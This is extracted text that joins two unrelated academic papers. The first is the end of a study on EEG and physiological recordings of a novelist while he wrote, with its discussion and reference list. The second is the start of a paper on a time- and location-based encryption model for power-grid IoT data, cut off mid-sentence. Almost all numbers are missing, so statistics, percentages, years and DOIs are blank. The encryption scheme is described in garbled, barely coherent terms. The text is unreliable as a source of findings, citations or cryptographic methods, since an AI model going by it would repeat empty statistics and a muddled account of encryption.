values > . ; see also fig. . because building a reliable valence and arousal classification algorithm using the calibration data turned out to be impossible, we could not further classify the novel writing data. facial expression in the calibration blocks we used the facereader r© output directly in the analysis and found no significant differences between the different emotional paragraphs. generally, the facial expression of the writer was classified as neutral (about %), sad (about %) or angry (about %). the remaining % was dispersed over happy, surprised, scared and disgusted. subjective questionnaires the des full showed neither differences over the days ( – ) nor over sessions (start—end of day). analysis of the feelings grid scores showed a significant effect of arousal over sessions: f( , )= . , p < . . a post-hoc lsd test showed a significant difference between start of the day and the end of block and end of the day. the analyses of the vas scores showed no effect over days, but a large effect over sessions of happy: f( , )= . , p < . , optimistic: f( , )= . , p < . and flow: f( , )= . , p < . , and a trend for relaxed: f( , )= . , p < . . the means of the significant effects over session are presented in fig. . the figure shows that happy, optimism and flow are rated high at the start of the day but systematically decrease over the writing sessions with a stabilization or reversal at the end of the day. for arousal, this effect is inverted. these trends are confirmed by post-hoc lsd tests. in the daily debriefing session at the end of the day, the writer indicated that the eeg cap was uncomfortable at the start but that he got used to wearing the cap and the other physiological sensors. he experienced the cameras as more obtrusive and disturbing than the physiological sensors. he elaborated on this in several public interviews (e.g., in the new york times: www.nyti.ms/ dgxkfr). discussion set-up and user experience the case study primarily focussed on measuring neurophysiological indices over prolonged periods outside a laboratory environment before applying the technology in a large scale experiment with the readers of the novel. inspection of the signals revealed that, except for eeg channels o , oz and o , we were able to record reliable signals in a real life situation using wearable/wireless sensor technology and that the setup was comfortable enough for the writer to work for hours a day wearing the sensors. the noise in the occipital channels may be caused by (neck) muscle activity related to mouse and keyboard actions. the ica analysis indicated that potential artifacts were non-stationary (i.e., changed over time), an effect similar to what we find with readers (brouwer et al., ). non-stationarities may be more common in real-world, multitasking environments and hamper identification and removal of artifacts (van erp, lotte & tangermann, ). this increases the relevance of including emg and eog sensors to the sensor suite. data analysis may also benefit from a higher electrode density allowing to apply more advanced techniques for artifact removal van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.nyti.ms/ dgxkfr http://dx.doi.org/ . /peerj-cs. figure significant changes in subjective ratings over the course of a writing day. and eeg analysis. recent electrode developments may enable this without reducing usability and comfort over prolonged periods of use. although measuring physiology outside a well-controlled laboratory environment is challenging, the data show reliable differences between resting state and writing, which indicates a sufficient signal-to-noise ratio in the data. it could still be the case that this ‘‘writing detector’’ is triggered by artifacts like eye movements or muscle activity that comes with typing (however, the eeg channels most prone to these muscle artifacts (o , oz and o ) were removed from the dataset). if we look at the weight of the different features in the classification algorithm, we see that most weight is attributed to the delta ( – hz) and theta ( – ) bands in the frontal channels (fp , fpz, fp ). low frequency bands should be evaluated with caution as they may reflects eye movements rather than signals in the primary eeg. this is especially relevant for the current dataset since (eye movement) artifacts were non-stationary and could not be reliably identified and removed. however, the classifier is also based on suppression of alpha and increased central gamma activity during writing. this matches with the expected pattern for creative writing although one should note that gamma can also be affected by e.g., jaw clenching artifacts. in addition, the current differences in physiology like increased heartrate and decreased heartrate variability (see fig. ) do fit with an interpretation of low (rest) and high cognitive activity (writing) and not just with simple muscle activity. to exclude the aforementioned artifacts, a comparison should be made between writing about an emotion, writing down mundane instructions, and for instance copying text or making random typing movements. neurophysiology of emotional writing since there are no data available about neurophysiological correlates of emotional writing, we based our expectations on research into physiological responses based on presenting van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. many repetitions of, for instance, emotional pictures or sounds. in this domain, recent experiments show that changes in emotional state can also be reliably identified with a restricted number of repetitions or even single trial (especially for longer epochs like in our study). therefore, we expected to be able to see changes in physiological state as a function of emotional content, despite the limited number of repetitions. however, we were not able to link specific neurophysiological indices to the emotional content of the writing. we have three possible explanations: ( ) the quantity and/or quality of the data was not sufficient, ( ) writing is a cognitive rather than an emotional task for this particular author, and ( ) the task involved a multitude of emotional, creative and cognitive processes concealing the single-task indices found in single-task laboratory experiments. the first explanation pleads for expanding the data set using more authors and possibly more sessions than we were currently able to gather. nevertheless, we should keep in mind that the current data was sufficiently reliable to classify rest from writing with % accuracy, and the employed classifications methods are sensitive enough to be used on smaller datasets. this forces us to look into alternative explanations as well before upscaling. one such explanation is that for this particular writer, the writing process itself may predominantly be a cognitive task and unrelated to the emotional content, i.e., the writer does not experience a particular emotion himself when writing about it. the neurophysiological pattern found in writing compared to rest and the facial expression (often classified as neutral) fit with the signature of a cognitive task. based on the vast production of the writer and as confirmed in later discussion with him, this is a viable option. in hindsight, the time pressure ( min per item), the strict instruction (write about this particular emotion fitting with this particular picture), the time of day (always in the morning before the writing block started), and the presence of the experimenter may all have triggered cognitive controlled creativity rather than emotional or spontaneous creativity. the third factor that may have played a role in the current results is the task setting that may have resulted in multiple processes (including but not limited to emotional, associative, creative, linguistic and motor planning processes). the resulting brain activity patterns may not be comparable to those for passive viewing of emotional pictures in a laboratory environment. subjective ratings the ratings of arousal, happy, optimistic and flow seem to show the same pattern. at the start of the day, the writer is in a ‘relaxed, good mood’ but his mood seems to dwindle during the writing with increasing arousal. at the end of the day, after the last writing session, this pattern stabilizes or is reversed. this profile in part reflects the circadian modulation of mood and related aspects. the ebook of the future one may ask if uncovering brain states associated with art will de-mythologize the process: will art lose its meaning, beauty or purity when reduced to activity of groups of neurons? will we eventually reveal the mechanisms of art and thus render it mechanical? will scientists be able to develop a drug that makes everyone a best-selling author? will this knowledge increase the ‘creativity rat race’ for artistic and creative success as cognitive van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. enhancers may do in the ‘cognitive rat race’ in the academic world (repantis et al., )? we think not—but raising and discussing these questions is of utmost importance for the field (van erp, lotte & tangermann, ). a more interesting debate is whether creative writing is a skill one can develop like skilled behavior in sports and music, or possibly even non-creative writing like scientists and journalists do on a daily basis. creative skills are important outside the arts and the creative industry and their importance is widely acknowledged in an innovative and knowledge-based economy. we would like to expand our research into (spontaneous) creativity to answer important questions and develop appropriate tests and tools to measure spontaneous creativity (which may require h measurements). current ebooks have the ability to track reader behavior and ebook retailers are actively gathering (anonymous) data of their readers on parameters such as the books the reader has finished (or not), how fast, where reading was discontinued and for how long and which words were looked up in a connected dictionary (flood, ). none of this information is directly used for the benefit of the reader but serves manufacturers and publishers only. the basis for our approach is to measure the readers’ state and behavior to make them the primary beneficiaries, for instance through enhancing the reader experience. there are many approaches foreseeable. a relatively simple one that is not interactive yet is to use the emotional response to give better informed advice on other books the reader may enjoy. in a similar way, readers may want to share their emotional profile, for instance by posting it on social media or through new communities of people with similar frames of mind around a specific book. real interactivity may also come in many forms. for instance, the emotional response may be used to add music or other multisensory stimuli to further intensify the experience or ultimately change the storyline or the flow of the book. this may lead to new media products that are somewhere in between literature, movies and games. acknowledgements we kindly acknowledge the great help of christian vermorken and marc grootjen from eaglescience, andrew spink from noldus it, and leo hoogendoorn from tmsi for providing hardware and software components and helping us with the measurements and analyses. we sincerely thank arnon grunberg and his publishers elik lettinga and paulien loerts from nijgh & van ditmar for sharing their time and their creative minds. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • jan b.f. van erp conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • maarten a. hogervorst analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • ysbrand d. van der werf conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the institutional review board of tno human factors (tcpe soesterberg, the netherlands) approved this study. data availability the following information was supplied regarding data availability: this article describes the data of a single participant who is mentioned by name. to protect his privacy (including full address), the raw data will only be available to those signing a non-disclosure agreement with the first author’s institution (tno). please contact the corresponding author for more information. references arden r, chavez rs, grazioplene r, jung re. . neuroimaging creativity: a psycho- metric view. behavioural brain research ( ): – doi . /j.bbr. . . . bahramisharif a, van gerven m, heskes t, jensen o. . covert attention allows for continuous control of brain–computer interfaces. european journal of neuroscience ( ): – doi . /j. - . . .x. bal pm, veltkamp m. . how does fiction reading influence empathy? an ex- perimental investigation on the role of emotional transportation. plos one ( ):e doi . /journal.pone. . barrett lf, russell ja. . the structure of current affect: controversies and emerging consensus. current directions in psychological science ( ): – doi . / - . . bayer m, sommer w, schacht a. . reading emotional words within sentences: the impact of arousal and valence on event-related potentials. international journal of psychophysiology ( ): – doi . /j.ijpsycho. . . . berns gs, blaine k, prietula mj, pye be. . short- and long-term effects of a novel on connectivity in the brain. brain connectivity ( ): – doi . /brain. . . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.bbr. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / - . http://dx.doi.org/ . / - . http://dx.doi.org/ . /j.ijpsycho. . . http://dx.doi.org/ . /brain. . http://dx.doi.org/ . /brain. . http://dx.doi.org/ . /peerj-cs. berntson gg, bigger jt, eckberg dl, grossman p, kaufmann pg, malik m, nagaraja hn, porges sw, saul jp, stone ph, van der molen mw. . heart rate vari- ability: origins, methods, and interpretive caveats. psychophysiology ( ): – doi . /j. - . .tb .x. brouwer a-m, hogervorst ma, herman p, kooi f. . are you really looking? finding the answer through fixation patterns and eeg. in: lecture notes in artificial intelligence, vol. : proceedings of the th international conference on foundations of augmented cognition, – . brouwer a-m, hogervorst m, reuderink b, van der werf y, van erp jbf. . physiological signals distinguish between reading emotional and non-emotional sections in a novel. brain–computer interfaces ( – ): – doi . / x. . . brouwer a-m, zander to, van erp jbf, korteling h, bronkhorst aw. . using neurophysiological signals that reflect cognitive or affective state: six recommenda- tions to avoid common pitfalls. frontiers in neuroscience : doi . /fnins. . . carlsson i, wendt pe, risberg j. . on the neurobiology of creativity. differ- ences in frontal activity between high and low creative subjects. neuropsychologia ( ): – doi . /s - ( ) - . carreiras m, armstrong bc, perea m, frost r. . the what, when, where, and how of visual word recognition. trends in cognitive sciences ( ): – doi . /j.tics. . . . chávez-eakle ra, graff-guerrero a, garcía-reyna j-c, vaugier v, cruz-fuentes c. . cerebral blood flow associated with creative performance: a comparative study. neuroimage ( ): – doi . /j.neuroimage. . . . citron fmm. . neural correlates of written emotion word processing: a review of recent electrophysiological and hemodynamic neuroimaging studies. brain & language : – doi . /j.bandl. . . . colibazzi t, posner j, wang z, gorman d, gerber a, yu s, zhu h, kangarlu a, duan y, russell ja, peterson bs. . neural systems subserving valence and arousal during the experience of induced emotion. emotion : – doi . /a . dalgleish t. . the emotional brain. nature reviews neuroscience ( ): – . dehaene s, cohen l, morais j, kolinsky r. . illiterate to literate: behavioural and cerebral changes induced by reading acquisition. nature reviews neuroscience : – doi . /nrn . dietrich a. . the cognitive neuroscience of creativity. psychonomic bulletin and review ( ): – doi . /bf . dietrich a, kanso r. . a review of eeg, erp, and neuroimaging studies of creativity and insight. psychological bulletin ( ): – doi . /a . dockray s, steptoe a. . positive affect and psychobiological processes. neuroscience & biobehavioral reviews ( ): – doi . /j.neubiorev. . . . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / x. . http://dx.doi.org/ . /fnins. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.tics. . . http://dx.doi.org/ . /j.tics. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.bandl. . . http://dx.doi.org/ . /a http://dx.doi.org/ . /a http://dx.doi.org/ . /nrn http://dx.doi.org/ . /bf http://dx.doi.org/ . /a http://dx.doi.org/ . /j.neubiorev. . . http://dx.doi.org/ . /peerj-cs. ekman p. . are there basic emotions? psychological review ( ): – doi . / - x. . . . ellamil m, dobson c, beeman m, christoff k. . evaluative and generative modes of thought during the creative process. neuroimage ( ): – doi . /j.neuroimage. . . . erhard k, kessler f, neumann n, ortheil h-j, lotze m. . professional training in creative writing is associated with enhanced fronto-striatal activity in a literary text continuation task. neuroimage : – doi . /j.neuroimage. . . . fink a, benedek m. . eeg alpha power and creative ideation. neuroscience and biobehavioral reviews : – doi . /j.neubiorev. . . . fleureau j, guillotel p, orlac i. . affective benchmarking of movies based on the physiological responses of a real audience. in: proceedings— humaine association conference on affective computing and intelligent interaction, acii , art. no. , – . flood a. . ebooks can tell which novels you didn’t finish. in: the guardian: december , books section. available at http://www.theguardian.com/books/ / dec/ /kobo-survey-books-readers-finish-donna-tartt. fox na. . if it’s not left: it’s right electroencephalograph asymmetry and the development of emotion. american psychologist ( ): – doi . / - x. . . . fredrickson bl, tugade mm, waugh ce, larkin gr. . what good are positive emotions in crises? a prospective study of resilience and emotions following the terrorist attacks on the united states on september th, . journal of personality and social psychology ( ): – doi . / - . . . . friedman j, hastie t, tibshirani r. . regularization paths for generalized linear models via coordinate descent. journal of statistical software : – doi . /jss.v .i . golland y, keissar k, levit-binnun n. . studying the dynamics of autonomic activity during emotional experience. psychophysiology ( ): – doi . /psyp. . grunberg a. . merit. available at http://www.arnongrunberg.com/blog/ -merit. hasson u, landesman o, knappmeyer b, vallines i, rubin n, heeger dj. . neurocinematics: the neuroscience of film. projections ( ): – . herbert c, ethofer t, anders s, junghöfer m, wildgruber d, grodd w, kissler j. . amygdala activation during reading of emotional adjectives—an advan- tage for pleasant content. social cognitive and affective neuroscience : – doi . /scan/nsn . herbert c, junghofer m, kissler j. . event related potentials to emotional adjectives during reading. psychophysiology ( ): – doi . /j. - . . .x. he q, xue g, chen c, chen c, lu z-l, dong q. . decoding the neuroanatomical basis of reading ability: a multivoxel morphometric study. journal of neuroscience ( ): – doi . /jneurosci. - . . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.neubiorev. . . http://www.theguardian.com/books/ /dec/ /kobo-survey-books-readers-finish-donna-tartt http://www.theguardian.com/books/ /dec/ /kobo-survey-books-readers-finish-donna-tartt http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . /psyp. http://dx.doi.org/ . /psyp. http://www.arnongrunberg.com/blog/ -merit http://dx.doi.org/ . /scan/nsn http://dx.doi.org/ . /scan/nsn http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /jneurosci. - . http://dx.doi.org/ . /peerj-cs. holt dj, lynn sk, kuperberg gr. . neurophysiological correlates of com- prehending emotional meaning in context. journal of cognitive neuroscience ( ): – doi . /jocn. . . hsu c-t, conrad m, jacobs am. . fiction feelings in harry potter: haemodynamic response in the mid-cingulate cortex correlates with immersive reading experience. neuroreport ( ): – doi . /wnr. . ishizu t, zeki s. . the brain’s specialized systems for aesthetic and perceptual judg- ment. european journal of neuroscience ( ): – doi . /ejn. . isotani t, lehmann d, pascual-marqui rd, fukushima m, saito n, yagyu t, ki- noshita t. . source localization of brain electric activity during positive, neutral and negative emotional states. international congress series : – doi . /s - ( ) - . johansen jd. . feelings in literature. integrative psychological and behavioral science ( ): – doi . /s - - - . johnson dr. . transportation into a story increases empathy, prosocial behavior, and perceptual bias toward fearful expressions. personality and individual differences ( ): – doi . /j.paid. . . . kawabata h, zeki s. . neural correlates of beauty. journal of neurophysiology ( ): – doi . /jn. . . kidd dc, castano e. . reading literary fiction improves theory of mind. science ( ): – doi . /science. . kissler j, assadollahi r, herbert c. . emotional and semantic networks in visual word processing: insights from erp studies. progress in brain research : – doi . /s - ( ) -x. klimesch w, sauseng p, hanslmayr s. . eeg alpha oscillations: the inhibition- timing hypothesis. brain research reviews : – doi . /j.brainresrev. . . . ko k-e, yang h-c, sim k-b. . emotion recognition using eeg signals with relative power values and bayesian network. international journal of control, automation and systems ( ): – doi . /s - - - . kreibig sd. . autonomic nervous system activity in emotion: a review. biological psychology ( ): – . kuchinke l, jacobs am, gubrich c, võ ml-h, conrad m, herrmann m. . incidental effects of emotional valence in single word processing: an fmri study. neuroimage : – doi . /j.neuroimage. . . . lang pj, bradley mm, cuthbert bn. . international affective picture system (iaps): affective ratings of pictures and instruction manual. technical report a- . gainesville: university of florida. lemm s, blankertz b, dickhaus t, müller kr. . introduction to machine learning for brain imaging. neuroimage ( ): – doi . /j.neuroimage. . . . leslie g, ojeda a, makeig s. . measuring musical engagement using expressive movement and eeg brain dynamics. psychomusicology: music, mind, and brain ( ): – doi . /pmu . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jocn. . http://dx.doi.org/ . /wnr. http://dx.doi.org/ . /ejn. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.paid. . . http://dx.doi.org/ . /jn. . http://dx.doi.org/ . /science. http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /j.brainresrev. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /pmu http://dx.doi.org/ . /peerj-cs. lewis pa, critchley hd, rotshtein p, dolan rj. . neural correlates of processing valence and arousal in affective words. cerebral cortex : – . lewis rs, weekes ny, wang th. . the effect of a naturalistic stressor on frontal eeg asymmetry, stress, and health. biological psychology ( ): – doi . /j.biopsycho. . . . limb cj, braun ar. . neural substrates of spontaneous musical performance: an fmri study of jazz improvisation. plos one ( ):e doi . /journal.pone. . liu s, chow hm, xu y, erkkinen mg, swett ke, eagle mw, rizik-baer da, braun ar. . neural correlates of lyrical improvisation: an fmri study of freestyle rap. scientific reports :article doi . /srep . lotze m, erhard k, neumann n, eickhoff sb, langner r. . neural correlates of verbal creativity: differences in resting-state functional connectivity associated with expertise in creative writing. frontiers in human neuroscience : . mar ra, oatley k, djikic m, mullin j. . emotion and narrative fiction: interactive influences before, during, and after reading. cognition and emotion ( ): – doi . / . . . mauss ib, robinson md. . measures of emotion: a review. cognition and emotion ( ): – doi . / . mayseless n, aharon-peretz j, shamay-tsoory s. . unleashing creativity: the role of left temporoparietal regions in evaluating and inhibiting the generation of creative ideas. neuropsychologia : – doi . /j.neuropsychologia. . . . mihov km, denzler m, förster j. . hemispheric specialization and creative thinking: a meta-analytic review of lateralization of creativity. brain and cognition ( ): – doi . /j.bandc. . . . min y-k, chung s-c, min b-c. . physiological evaluation on emotional change induced by imagination. applied psychophysiology biofeedback ( ): – doi . /s - - - . muehl c, van den broek e, brouwer a-m, nijboer f, van wouwe n, heylen d. . multi-modal affect induction for affective brain–computer interfaces. in: affective computing and intelligent interaction—lecture notes in computer science. vol. / . berlin heidelberg: springer, – . available at http://link.springer. com/chapter/ . % f - - - - _ . nijhof ad, willems rm. . simulatingfiction: individual differences in lit- erature comprehension revealed with fmri. plos one ( ):e doi . /journal.pone. . piffer d. . can creativity be measured? an attempt to clarify the notion of creativity and general directions for future research. thinking skills and creativity : – doi . /j.tsc. . . . posner j, russell ja, gerber a, gorman d, colibazzi t, yu s, wang z, kangarlu a, zhu h, peterson bs. . the neurophysiological bases of emotion: an fmri study of the affective circumplex using emotion-denoting words. human brain mapping : – doi . /hbm. . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.biopsycho. . . http://dx.doi.org/ . /j.biopsycho. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /srep http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.neuropsychologia. . . http://dx.doi.org/ . /j.bandc. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://link.springer.com/chapter/ . % f - - - - _ http://link.springer.com/chapter/ . % f - - - - _ http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.tsc. . . http://dx.doi.org/ . /j.tsc. . . http://dx.doi.org/ . /hbm. http://dx.doi.org/ . /peerj-cs. posner j, russell ja, peterson bs. . the circumplex model of affect: an integrative approach to affective neuroscience, cognitive development, and psychopathology. development and psychopathology ( ): – doi . /s . rellecke j, palazova m, sommer w, schacht a. . on the automaticity of emotion processing in words and faces: event-related brain potentials evidence from a superficial task. brain and cognition ( ): – doi . /j.bandc. . . . repantis d, schlattmann p, laisney o, heuser i. . modafinil and methylphenidate for neuroenhancement in healthy individuals: a systematic review. pharmacological research : – doi . /j.phrs. . . . reuderink b, mühl c, poel m. . valence, arousal and dominance in the eeg during game play. international journal of autonomous and adaptive communications systems ( ): – doi . /ijaacs. . . roth wt. . a comparison of p and the skin conductance response. in: gaillard awk, ritter w, eds. tutorials in erp research—endogenous components. amster- dam: north-holland, – . russell j. . a circumplex model of affect. journal of personality and social psychology : – doi . /h . russell ja, barrett lf. . core affect, prototypical emotional episodes, and other things called emotion: dissecting the elephant. journal of personality and social psychology ( ): – doi . / - . . . . russell ja, weiss a, mendelsohn ga. . affect grid: a single-item scale of plea- sure and arousal. journal of personality and social psychology ( ): – doi . / - . . . . schmidt la, trainor lj. . frontal brain electrical activity (eeg) distinguishes valence and intensity of musical emotions. cognition and emotion ( ): – doi . / . shah c, erhard k, ortheil h-j, kaza e, kessler c, lotze m. . neural correlates of creative writing: an fmri study. human brain mapping ( ): – doi . /hbm. . shamay-tsoory sg, adler n, aharon-peretz j, perry d, mayseless n. . the origins of originality: the neural bases of creative thinking and originality. neuropsychologia ( ): – doi . /j.neuropsychologia. . . . tomarken aj, davidson rj, wheeler re, doss rc. . individual differences in anterior brain asymmetry and fundamental dimensions of emotion. journal of personality and social psychology ( ): – doi . / - . . . . tovote p, fadok jp, luthi a. . neural circuits for fear and anxiety. nature reviews neuroscience ( ): – doi . /nrn . van der werf yd, van erp jbf. . monitoring the physiology of the creative process. in: spink aj, loijens lws, woloszynowska-fraser m, noldus lpjj, eds. proceedings of measuring behavior. wageningen: measuring behavior. van erp jbf, brouwer a-m, thurlings me, werkhoven pj. . framework for bcis in multimodal interaction and multitask environments. in: towards practical brain– computer interfaces. berlin heidelberg: springer, – . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s http://dx.doi.org/ . /j.bandc. . . http://dx.doi.org/ . /j.phrs. . . http://dx.doi.org/ . /ijaacs. . http://dx.doi.org/ . /h http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /hbm. http://dx.doi.org/ . /hbm. http://dx.doi.org/ . /j.neuropsychologia. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /nrn http://dx.doi.org/ . /peerj-cs. van erp jbf, brouwer a-m, zander to. . editorial: using neurophysiological signals that reflect cognitive or affective state. frontiers in neuroscience : . van erp jbf, lotte f, tangermann m. . brain–computer interfaces: beyond medical applications. ieee computer ( ): – . van erp jbf, thurlings me, brouwer a-m, werkhoven pj. . bcis in multimodal interaction and multitask environments: theoretical issues and initial guidelines. in: universal access in human-computer interaction. users diversity. berlin heidelberg: springer, – . van gerven m, bahramisharif a, farquhar j, heskes t. . donders machine learning toolbox (dmlt) for matlab version / / . available at https://github. com/distrep/dmlt . verona e, sadeh n, curtin jj. . stress-induced asymmetric frontal brain ac- tivity and aggression risk. journal of abnormal psychology ( ): – doi . /a . walter h. . social cognitive neuroscience of empathy: concepts, circuits, and genes. emotion review ( ): – doi . / . van erp et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/distrep/dmlt https://github.com/distrep/dmlt http://dx.doi.org/ . /a http://dx.doi.org/ . /a http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - application of the source encryption algorithm model in the power industry jiao longbing shaanxi huabiao network technology co., ltd. xi’an, , china e-mail: james @ .com abstract—with the development of internet technology and internet of things technology, the internet of everything has become a hot topic, and in march , the national grid for the first time clarified the definition of the pan-in power internet of things, pointing out that the company's most urgent and important task is to accelerate the construction of the pan-in power internet of things. the security of data transfer on-line at any time is particularly important, in order to ensure the security of data, in the process of data transmission, data needs to be encrypted. this paper expounds a model of the information source data encryption algorithm, analyzes the encryption algorithm and the encryption method, and then provides a reference basis for the data transmission data security of power system. keywords-data communication; encryption algorithm model; encryption technology i. introduction driven by intelligence and informatization, ubiquitous electric internet of things is just at the right time. the construction of power internet of things puts forward higher requirements for data management and information management. at present, the state grid system is connected to more than million terminal devices, and with the construction of electric internet of things and the surge, there will be a huge amount of data. data is an important asset, data privacy protection, the construction of data security grading system, based on different security levels to determine the open rights of data, to ensure the efficiency of business execution and smooth management. internet of things technology is developing rapidly, but the corresponding infrastructure and security protection capabilities do not adapt to it. network security is the biggest hidden danger of the power internet of things. on the one hand, non-ip communication protocol is often used to transmit data in the internet of things, which lacks effective security measures. on the other hand, the increasingly intelligent and professional means of network attack have brought new problems to network security protection, leading to frequent network security incidents in the field of power grid in recent years. therefore, strengthening the security risk control and management of intelligent and informationized power internet of things will be a key point of china's ubiquitous power internet of things construction. this paper will focus on the introduction of a source encryption algorithm model, hoping to provide a digital security model reference for the application of digital business in the power industry. ii. introduction to encryption technology as an important part of network security, data encryption technology plays a very important role in the network. it involves the confidentiality, authentication, non-repudiation and integrity of data. key is the key of data encryption, which controls the international journal of advanced network, monitoring and controls volume , no. , implementation of encryption and decryption algorithms. according to the different keys, the encryption technology is divided into symmetric encryption technology, asymmetric encryption technology, mixed encryption technology. a. symmetric encryption symmetric encryption means that the encryption key can be inferred from the decryption key, and the decryption key can also be inferred from the encryption key. in most symmetric algorithms, the encryption key and the decryption key are the same. for this algorithm, its key (secret key) usually needs messenger or secret channel to transmit, and it is difficult to transmit and manage the key. in this case, the secret preservation of the key determines the security of the algorithm. rc , chaos algorithm, des, idea, rcz algorithm are typical representative of symmetric key encryption system. because both parties have the same key, symmetric encryption technology is easy to implement and fast, so it is widely used in communication and storage data encryption and decryption. the security of symmetric encryption depends on the key, so the secret of the key is very important to the security of communication. the symmetric encryption process is shown in the figure . figure . symmetric encryption flow chart b. asymmetric encryption this technique can also be called public key cryptography. the encryption key (public key) can be made public, that is, it can be obtained by strangers and used to encrypt the information, but the information can only be decrypted with the corresponding decryption key (private key). compared with symmetric encryption algorithms, asymmetric encryption algorithms usually require two keys: public key and private key. when data is encrypted with a key, if it is encrypted with a public key, it can only be decrypted with the corresponding private key. instead, it is decrypted with the corresponding public key. the advantage of public key cryptography is that it can adapt to the open requirements of the network, but the speed is relatively slow, not suitable for encrypting files. the asymmetric encryption process is shown in the figure . figure . asymmetric encryption flowchart c. hybrid encryption hybrid encryption is not a single encryption technology, but a combination of the above two data encryption technology combined product. the communication process of the communication parties is divided into two parts. the parties first use asymmetric encryption technology to transmit the symmetric key used in the communication, and then use symmetric encryption technology to encrypt and transmit the file. iii. temporal and spatial variables participate in the source encryption model a. time variable definition: ) year, month, day, hour and time variables international journal of advanced network, monitoring and controls volume , no. , table i. time variometer a b c d e f g h i j k l a aa ba ca da ea fa ga ha ia ja ka la b ab bb cb db eb fb gb hb ib jb kb lb c ac bc cc dc ec fc gc hc ic jc kc lc d ad bd cd dd ed fd gd hd id jd kd ld e ae be ce de ee fe ge he ie je ke le f af bf cf df ef ff gf hf if jf kf lf g ag bg cg dg eg fg gg hg ig jg kg lg h ah bh ch dh eh fh gh hh ih jh kh lh i ai bi ci di ei fi gi hi ii ji ki li j aj bj cj dj ej fj gj hj ij jj kj lj year, month, day and hour variables are added to the partial key format of data information source, as shown in figure format, bits and bits are combined to form a unique time variable. year, month, day, and hour cycle with and map to gregorian calendar time. ) increase position variable the position variable is assigned to map the location of the source to the latitude and longitude coordinates. as the key bit. table ii. location variables southeast south southwest east center west northeast north northwest ) the source data is rearranged and encrypted according to location, time and solar term variables the data format conversion of an encryption depends on a unique time point, and the time point of data encryption determines that the data conversion mode in the figure below is unique. figure . data conversion mode determine the starting time of the data encryption variable, time variable form the basis for packet rotation changes, packets after be confirmed time and location, the data layer, and then each layer of blocks, each block in the above order to secondary polarization, and then according to the law of time each block and the page will be rotating, and the rule of each page rotation, eventually forming the smallest unit, each unit to block position number. after the above sequence of data format and order is completely disrupted, according to the unconventional format of the order, is to refer to the passage of time and position rotation. after such data arrangement, data, pictures, videos and other files, even if they are intercepted, cannot obtain the key encryption variables of time, solar term and location, and cannot obtain useful key information even if they are enumerated. ) law of rotation arrangement of source data format after the data is divided into different pages, it is rotated and changed according to the hierarchy of layers. for example, the bottom layer is the rotation mode, the third layer is the feig reordering, the second layer is the rotation according to the third layer of feig, the first layer is the rotation according to the second international journal of advanced network, monitoring and controls volume , no. , layer of rotation. to this data page is partitioned and rearranged. then the quadratic element is carried out, and the data block of the first part is redistributed into blocks. after three dimensions, three dimensions and four dimensions are differentiated to the smallest data unit bit. figure . rotation arrangement rule ) data decryption process model figure . data decryption model a) the sender rearranges the blocks and pages of the data format according to the time variable and the position marker bit, and the quadratic element and cubic element are segmented and arranged according to the same method to form the minimum bit of scatter random data. b) transfer process: the file transfer process is transmitted with three-point random minimum bit data, and the time at this time is a shift. after the time shift, the information received by the receiver should be arranged according to the change of time variable for time key mapping. c) c. data receiver, the receiver is minimum scatter data, the receiver must key is 